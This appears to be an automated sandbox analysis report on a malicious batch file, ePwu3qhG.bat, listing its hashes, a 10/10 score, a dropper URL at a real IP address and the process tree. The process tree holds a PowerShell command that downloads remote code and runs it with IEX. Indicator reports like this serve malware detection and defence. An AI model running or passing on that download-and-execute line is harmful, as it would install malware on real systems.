Analysis
-
max time kernel
103s -
max time network
155s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
16-03-2020 15:10
General
-
Target
ePwu3qhG.bat
-
Size
195B
-
MD5
aaa7b25a5b6939e0c9f77a1d8c141ff1
-
SHA1
9a68e6ebd88ee65a64c80eabd25057e8b1f7a0c3
-
SHA256
d03a1ed079e497d770b0661e81fe675fe379107ec06f75ce916466d2026b9310
-
SHA512
bc6ac64ddfeeed68bb844d913716f47f951b488d2a509993e73202577b72b129d4c725baeb5fc5bf191c97a4cb8b90d319ed23b8c9056eeb9d9d5d34acd0976e
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/ePwu3qhG
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ePwu3qhG.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ePwu3qhG');Invoke-HKEJEPZNRMGY;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB